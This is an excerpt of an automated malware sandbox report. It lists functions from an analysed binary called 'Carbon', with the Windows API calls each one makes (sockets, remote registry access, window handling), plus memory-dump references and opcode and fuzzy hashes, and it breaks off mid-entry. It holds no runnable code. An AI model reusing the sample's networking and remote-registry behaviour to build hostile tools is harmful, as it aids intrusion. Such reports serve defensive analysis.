                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 4072794657-3128320259
                                                            • Opcode ID: 721d34c06cec45a554efb81a38fcec7b99b62aef1b09442e5e6a68ff80b79ec7
                                                            • Instruction ID: 2d18d5cc2092ad64532f3045f828edb423490b33b4586d6f6bed59509857531b
                                                            • Opcode Fuzzy Hash: 721d34c06cec45a554efb81a38fcec7b99b62aef1b09442e5e6a68ff80b79ec7
                                                            • Instruction Fuzzy Hash: 570186F69082087FE710E7A09D89EEB776CDB08301F404591B746E2182EA749E845B75
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F63C7 Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 008F63ED
                                                            • GetWindowRect.USER32(?,?), ref: 008F642E
                                                            • ScreenToClient.USER32(?,?), ref: 008F6456
                                                            • GetClientRect.USER32(?,?), ref: 008F6594
                                                            • GetWindowRect.USER32(?,?), ref: 008F65B5
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Rect$Client$Window$Screen
                                                            • String ID:
                                                            • API String ID: 1296646539-0
                                                            • Opcode ID: 2433a84cfd78189d01adfaa6b366ed00df7bd2c6e8f8773fe9cf82f4cabb9c20
                                                            • Instruction ID: 60b58f8a157d970db5988e036997b3fc183088ae6d6bef25b77dad6407518049
                                                            • Opcode Fuzzy Hash: 2433a84cfd78189d01adfaa6b366ed00df7bd2c6e8f8773fe9cf82f4cabb9c20
                                                            • Instruction Fuzzy Hash: 0EB16734A0064ADBCB14DFB8C5806FAB7F1FF58314F14851AE9AAE7250EB34E960DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00920477 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __allrem.LIBCMT ref: 0092037A
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00920396
                                                            • __allrem.LIBCMT ref: 009203AD
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009203CB
                                                            • __allrem.LIBCMT ref: 009203E2
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00920400
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            • Opcode ID: bb70fbf8712866e45b4faa7f7f8fe4dde1b6e07870e24eca50304fdefdcf9db0
                                                            • Instruction ID: bdadb77094657661f64fcfd2e0a6d8d8d43acbe3bbedb498e5a794dff65764f6
                                                            • Opcode Fuzzy Hash: bb70fbf8712866e45b4faa7f7f8fe4dde1b6e07870e24eca50304fdefdcf9db0
                                                            • Instruction Fuzzy Hash: A7810B71A00726AFD724EF68EC81B6A73ECAFC0720F24452AF561D7697E770E9408B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00972497 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 009738D0: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,009717A3,00000000,?,?,00000000), ref: 0097391C
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00972547
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00972568
                                                            • WSAGetLastError.WSOCK32 ref: 00972579
                                                            • inet_ntoa.WSOCK32(?), ref: 00972613
                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00972662
                                                            • _strlen.LIBCMT ref: 009726BC
                                                              • Part of subcall function 009540D3: _strlen.LIBCMT ref: 009540DD
                                                              • Part of subcall function 008F76BB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0090C099,?,?,?), ref: 008F76D7
                                                              • Part of subcall function 008F76BB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0090C099,?,?,?,?,008F9E49,?,?), ref: 008F770A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                            • String ID:
                                                            • API String ID: 1923757996-0
                                                            • Opcode ID: 5a16b10fc5dbbb719f7f69fefec7d183690af02dbf217ece84553d71e2c5fa2f
                                                            • Instruction ID: d8d0a2d9bd3879bbfde87ba400e7dec3521f336b68f0eb8bb8e6c646d833bdfa
                                                            • Opcode Fuzzy Hash: 5a16b10fc5dbbb719f7f69fefec7d183690af02dbf217ece84553d71e2c5fa2f
                                                            • Instruction Fuzzy Hash: 15A1B276214300AFC314EB24C895F2AB7E9EFD4318F54894CF55A8B2A2DB71ED45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0092654E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00918629,00918629,?,?,?,0092679F,00000001,00000001,8BE85006), ref: 009265A8
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0092679F,00000001,00000001,8BE85006,?,?,?), ref: 0092662E
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00926728
                                                            • __freea.LIBCMT ref: 00926735
                                                              • Part of subcall function 00923B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00916A59,?,0000015D,?,?,?,?,00918590,000000FF,00000000,?,?), ref: 00923BA2
                                                            • __freea.LIBCMT ref: 0092673E
                                                            • __freea.LIBCMT ref: 00926763
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 711984177157a5753e415a6e7ced3a02517c90f4d9914d61d6934635fbf6798e
                                                            • Instruction ID: 55bd64b7277b47e5e6f3a978b680112081913d0f018b77c7ac193a3885590810
                                                            • Opcode Fuzzy Hash: 711984177157a5753e415a6e7ced3a02517c90f4d9914d61d6934635fbf6798e
                                                            • Instruction Fuzzy Hash: AB51EF72600226ABEB259F64EC81FAF77AEEF94754F144628FC04D6588EB34DD50C6A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0097C362 Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 0097D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097BE35,?,?), ref: 0097D13C
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D178
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D1E6
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D21C
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0097C451
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0097C4AC
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097C4F1
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0097C520
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0097C57A
                                                            • RegCloseKey.ADVAPI32(?), ref: 0097C586
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 1120388591-0
                                                            • Opcode ID: 5d8a64504dd5efa2fc923d955f03e674c3bff2b902ec3c9bc5fbe4411f799225
                                                            • Instruction ID: 53ff60baa99c6aeb68f10d29a65aa14d0e6bf0295131730b3050bf3a41eac885
                                                            • Opcode Fuzzy Hash: 5d8a64504dd5efa2fc923d955f03e674c3bff2b902ec3c9bc5fbe4411f799225
                                                            • Instruction Fuzzy Hash: C481A271208245AFC714DF24C895E3ABBE9FF84308F54895CF5598B2A2DB31ED45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0098838D Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009883D1
                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 009883F6
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0098840E
                                                            • GetSystemMetrics.USER32(00000004), ref: 00988437
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0096BF1C,00000000), ref: 00988457
                                                              • Part of subcall function 00909DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00909DE2
                                                            • GetSystemMetrics.USER32(00000004), ref: 00988442
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: c731d3138909ed1deb5731a124b3686be3ab22e41a46661fe8f5bdb99bcc2c66
                                                            • Instruction ID: f94d25d6d5320ce3e6981616c4fc509db22152b638959241ead85ff663a97eb6
                                                            • Opcode Fuzzy Hash: c731d3138909ed1deb5731a124b3686be3ab22e41a46661fe8f5bdb99bcc2c66
                                                            • Instruction Fuzzy Hash: 6E21A472625206AFCB14AF38CC08B6B37A9FB45325F154A29F926C23F0DF308850DB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0098453A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009845F3
                                                            • IsMenu.USER32(?), ref: 00984608
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00984650
                                                            • DrawMenuBar.USER32 ref: 00984663
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID: 0
                                                            • API String ID: 3076010158-4108050209
                                                            • Opcode ID: a5b0bef0234d468c2a5a69e50f6c5105f95e2991e15fc619f3b0047f224b4150
                                                            • Instruction ID: 2ca20e411099023efd094bb1cacf2ed2c0b1ac1d7d3e6904916f09d35f448960
                                                            • Opcode Fuzzy Hash: a5b0bef0234d468c2a5a69e50f6c5105f95e2991e15fc619f3b0047f224b4150
                                                            • Instruction Fuzzy Hash: 22413A75A0520AEFDB10EF64D884EAABBB8FF45358F044129F915AB351E730AD50DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009524C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00952548
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0095255B
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 0095258B
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2081771294-1403004172
                                                            • Opcode ID: c66a7d314b97d9de66e28819a8a2abc43854ca3efaef6d20b216ad10dc63c5c7
                                                            • Instruction ID: ca345d5b98dd18f39ef873a093ad4d2c1eb93dcd101d2c45a790e6b69baaadd2
                                                            • Opcode Fuzzy Hash: c66a7d314b97d9de66e28819a8a2abc43854ca3efaef6d20b216ad10dc63c5c7
                                                            • Instruction Fuzzy Hash: CB2107B19001087EDB08ABB5CC96DFEBBB9DF86365F104519F912972E0EB38594B9720
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0097C150 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 0097D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097BE35,?,?), ref: 0097D13C
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D178
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D1E6
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D21C
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0097C22C
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0097C287
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0097C2EA
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0097C32D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097C33A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 826366716-0
                                                            • Opcode ID: 59df9f51ed375fdb5d304c0b44caa3704c09347cfbbaaad82a3fa9dc73814d90
                                                            • Instruction ID: 0f91ae1af46a5bac1dba14d8518cff49062b4a1b139ab4bb586605e9487a5897
                                                            • Opcode Fuzzy Hash: 59df9f51ed375fdb5d304c0b44caa3704c09347cfbbaaad82a3fa9dc73814d90
                                                            • Instruction Fuzzy Hash: CE61B172208245AFC714DF64C890E2ABBE9FF84308F54C95DF5598B2A2DB31ED45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00922311 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: c5c3082419347f69f26b14c4f3fe55c7890a1a5dae24d0619661407c96a08bc0
                                                            • Instruction ID: 8827d9aa58235b4b9e45f9dbc4468553703286662abda2df8d8173d09f59794c
                                                            • Opcode Fuzzy Hash: c5c3082419347f69f26b14c4f3fe55c7890a1a5dae24d0619661407c96a08bc0
                                                            • Instruction Fuzzy Hash: CD411432A00214AFCB24DF78D880A6EB3F6EF89714F1545A8E515EB395E735ED41CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00950695 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?,?,009509E5), ref: 009506B2
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?), ref: 009506CD
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?), ref: 009506DB
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?), ref: 009506EB
                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?), ref: 009506F7
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: 620bd071db41d0829dfc4b26fc8583f95697550db2a3f9aa8e508261d6d82da3
                                                            • Instruction ID: c6b93b418394f4c9c3927691b5ee8bc6d4c01b603dea425b6231d42263713d9f
                                                            • Opcode Fuzzy Hash: 620bd071db41d0829dfc4b26fc8583f95697550db2a3f9aa8e508261d6d82da3
                                                            • Instruction Fuzzy Hash: 4B01DB72612209AFDB109F65CC08B9A7BADEFC87A2F140124FD05D2210EB70CD00ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095633D Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00956351
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00956368
                                                            • MessageBeep.USER32(00000000), ref: 00956380
                                                            • KillTimer.USER32(?,0000040A), ref: 0095639C
                                                            • EndDialog.USER32(?,00000001), ref: 009563B6
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 81a5063a1f6d34a36665bd49472c4ae20a628976d50949053b15ec9bc6dabf9b
                                                            • Instruction ID: 4051e0186875f0acd41ad2c2ff36e91385c583db1c74f74c090da9dc91c3ea00
                                                            • Opcode Fuzzy Hash: 81a5063a1f6d34a36665bd49472c4ae20a628976d50949053b15ec9bc6dabf9b
                                                            • Instruction Fuzzy Hash: 0D018630515308ABEF319B51DD4EB967778FF10706F400659B586A21E1E7F4A948DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00922560 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0092257E
                                                              • Part of subcall function 00922D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0092DB22,009C1DB4,00000000,009C1DB4,00000000,?,0092DB49,009C1DB4,00000007,009C1DB4,?,0092DF46,009C1DB4), ref: 00922D2E
                                                              • Part of subcall function 00922D18: GetLastError.KERNEL32(009C1DB4,?,0092DB22,009C1DB4,00000000,009C1DB4,00000000,?,0092DB49,009C1DB4,00000007,009C1DB4,?,0092DF46,009C1DB4,009C1DB4), ref: 00922D40
                                                            • _free.LIBCMT ref: 00922590
                                                            • _free.LIBCMT ref: 009225A3
                                                            • _free.LIBCMT ref: 009225B4
                                                            • _free.LIBCMT ref: 009225C5
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: d60c0fd4dbad9d75f17fd7b31fd9289dd22683579ba1c29f95400141bdded1b8
                                                            • Instruction ID: 089ae9a820a7d4151a0a455a681c9e295ea7c14bf776373b3840a1cf045431cf
